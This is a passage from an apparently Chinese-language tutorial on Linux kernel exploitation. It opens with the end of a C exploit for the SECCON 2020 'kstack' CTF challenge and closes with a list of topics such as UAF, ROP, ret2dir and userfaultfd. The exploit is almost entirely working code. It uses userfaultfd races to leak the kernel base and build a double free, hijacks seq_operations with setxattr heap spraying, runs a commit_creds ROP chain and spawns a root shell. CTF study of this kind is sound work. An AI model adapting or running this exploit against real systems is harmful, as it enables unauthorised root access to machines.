        }
        if (msg.event != UFFD_EVENT_PAGEFAULT) {
            puts("[-] Unexpected event on userfaultfd");
            exit(EXIT_FAILURE);
        }

        puts("[*] add trapped in userfaultfd.");
        del(&kernel_offset);

        printf("[+] leak addr: %p\n", kernel_offset);
        kernel_offset -= 0xffffffff8113be80;

        struct uffdio_copy uffdio_copy;
        uffdio_copy.src = (unsigned long) page;
        uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address & ~(page_size - 1);
        printf("[*] uffdio_copy.dst: %p\n", uffdio_copy.dst);
        uffdio_copy.len = page_size;
        uffdio_copy.mode = 0;
        uffdio_copy.copy = 0;
        if (ioctl((int) uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
            puts("[-] Error at: ioctl-UFFDIO_COPY");
            exit(-1);
        }
        return;
    }
}

void double_free_thread(void *arg) {
    long uffd = (long) arg;
    while (true) {
        struct pollfd pollfd;
        pollfd.fd = (int) uffd;
        pollfd.events = POLLIN;
        int nready = poll(&pollfd, 1, -1);
        if (nready == -1) {
            puts("[-] Error at: poll");
            exit(-1);
        }
        static struct uffd_msg msg;
        ssize_t nread = read((int) uffd, &msg, sizeof(msg));
        if (nread == 0) {
            puts("[-] Error at: EOF on userfaultfd!");
            exit(EXIT_FAILURE);
        }
        if (nread == -1) {
            puts("[-] Error at: read");
            exit(-1);
        }
        if (msg.event != UFFD_EVENT_PAGEFAULT) {
            puts("[-] Unexpected event on userfaultfd");
            exit(EXIT_FAILURE);
        }

        puts("[*] del trapped in userfaultfd.");
        puts("[*] construct the double free...");
        del(page);

        struct uffdio_copy uffdio_copy;
        uffdio_copy.src = (unsigned long) page;
        uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address & ~(page_size - 1);
        printf("[*] uffdio_copy.dst: %p\n", uffdio_copy.dst);
        uffdio_copy.len = page_size;
        uffdio_copy.mode = 0;
        uffdio_copy.copy = 0;
        if (ioctl((int) uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
            puts("[-] Error at: ioctl-UFFDIO_COPY");
            exit(-1);
        }
        return;
    }
}

int seq_fd_reserve[100], seq_fd;

void *hijack_thread(void *arg) {
    long uffd = (long) arg;
    while (true) {
        struct pollfd pollfd;
        pollfd.fd = (int) uffd;
        pollfd.events = POLLIN;
        int nready = poll(&pollfd, 1, -1);
        if (nready == -1) {
            puts("[-] Error at: poll");
            exit(-1);
        }
        static struct uffd_msg msg;
        ssize_t nread = read((int) uffd, &msg, sizeof(msg));
        if (nread == 0) {
            puts("[-] Error at: EOF on userfaultfd!");
            exit(EXIT_FAILURE);
        }
        if (nread == -1) {
            puts("[-] Error at: read");
            exit(-1);
        }
        if (msg.event != UFFD_EVENT_PAGEFAULT) {
            puts("[-] Unexpected event on userfaultfd");
            exit(EXIT_FAILURE);
        }

        puts("[*] setxattr trapped in userfaultfd.");
        for (int i = 0; i < 100; i++) {
            close(seq_fd_reserve[i]);
        }

        pop_rdi_ret += kernel_offset;
        mov_rdi_rax_pop_rbp_ret += kernel_offset;
        prepare_kernel_cred += kernel_offset;
        commit_creds += kernel_offset;
        swapgs_restore_regs_and_return_to_usermode += kernel_offset + 0x10;

        __asm__(
                "mov r15,   0xbeefdead;"
                "mov r14,   0x11111111;"
                "mov r13,   pop_rdi_ret;"
                "mov r12,   0;"
                "mov rbp,   prepare_kernel_cred;"
                "mov rbx,   mov_rdi_rax_pop_rbp_ret;"
                "mov r11,   0x66666666;"
                "mov r10,   commit_creds;"
                "mov r9,    swapgs_restore_regs_and_return_to_usermode;"
                "mov r8,    0x99999999;"
                "xor rax,   rax;"
                "mov rcx,   0xaaaaaaaa;"
                "mov rdx,   8;"
                "mov rsi,   rsp;"
                "mov rdi,   seq_fd;"
                "syscall");

        puts("[+] back to userland successfully!");

        printf("[+] uid: %d gid: %d\n", getuid(), getgid());

        puts("[*] execve root shell now...");
        system("/bin/sh");
    }
}

void register_userfaultfd(void *addr, size_t len, void *(*handler)(void *)) {
    long uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if (uffd == -1) {
        puts("[-] Error at: userfaultfd");
        exit(-1);
    }
    struct uffdio_api uffdio_api = {.api = UFFD_API, .features = 0};
    if (ioctl((int) uffd, UFFDIO_API, &uffdio_api) == -1) {
        puts("[-] Error at: ioctl-UFFDIO_API");
        exit(-1);
    }
    struct uffdio_register uffdio_register;
    uffdio_register.range.start = (unsigned long) addr;
    uffdio_register.range.len = len;
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
    if (ioctl((int) uffd, UFFDIO_REGISTER, &uffdio_register) == -1) {
        puts("[-] Error at: ioctl-UFFDIO_REGISTER");
        exit(-1);
    }
    static pthread_t monitor_thread;
    if (pthread_create(&monitor_thread, NULL, handler, (void *) uffd) != 0) {
        puts("[-] Error at: pthread_create");
        exit(-1);
    }
}

int main() {
    bind_core(0);

    if ((dev_fd = open("/proc/stack", O_RDONLY)) < 0) {
        puts("[-] open kstack error.");
        exit(-1);
    }

    page_size = getpagesize();
    page = (char *) mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

    for (int i = 0; i < 100; i++) {
        if ((seq_fd_reserve[i] = open("/proc/self/stat", O_RDONLY)) < 0) {
            puts("[-] open seq_operation error.");
            exit(-1);
        }
    }

    void *leak_uffd_buf = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    register_userfaultfd(leak_uffd_buf, page_size, (void *) leak_thread);

    if ((seq_fd = open("/proc/self/stat", O_RDONLY)) < 0) {
        puts("[-] open seq_operation error.");
        exit(-1);
    }

    close(seq_fd);
    add(leak_uffd_buf);

    printf("[+] kernel offset: %p\n", kernel_offset);

    void *uaf_uffd_buf = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    register_userfaultfd(uaf_uffd_buf, page_size, (void *) double_free_thread);

    add("aaa");
    del(uaf_uffd_buf);
    char *hijack_uffd_buf = (char *) mmap(NULL, page_size * 2, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    register_userfaultfd(hijack_uffd_buf + page_size, page_size, (void *) hijack_thread);
    *(size_t *) (hijack_uffd_buf + page_size - 8) = 0xffffffff814d51c0 + kernel_offset;

    if ((seq_fd = open("/proc/self/stat", O_RDONLY)) < 0) {
        puts("[-] open seq_operation error.");
        exit(-1);
    }

    setxattr("/exp", page, hijack_uffd_buf + page_size - 8, 32, 0);

    return 0;
}

linux kernel pwn 内核利用

NULL Pointer Dereference

Kernel Stack Buffer Overflow

ret2user

kernel rop

kernel rop + ret2user

利用 pt_regs 构造 kernel ROP

ret2dir

例题：MINI-LCTF2022 - kgadget

Kernel Heap Exploit

Use After Free

修改 cred

利用 tty_struct 劫持程序控制流提权

Heap Overflow

修改 cred

堆溢出 + 堆喷射覆写 seq_operations 控制内核执行流

Off By Null

例题：corCTF2022 corjail（kmalloc-4k）

例题：D^3CTF2023 d3kcache

Arbitrary Address Allocation

例题：RWCTF2022高校赛 - Digging into kernel 1 & 2

Arbitrary Address Free（Only Heap Address）

Kernel Unlink

simple_xattr

Page-level Heap Fengshui

例题：corCTF2022 - cache-of-castaways

Race condition

double fetch

例题：2018 0CTF Finals Baby Kernel

userfaultfd

例题：D^3CTF2019 - knote

例题：强网杯2021 notebook

setxattr + userfaultfd 堆占位技术

例题：SECCON 2020 kstack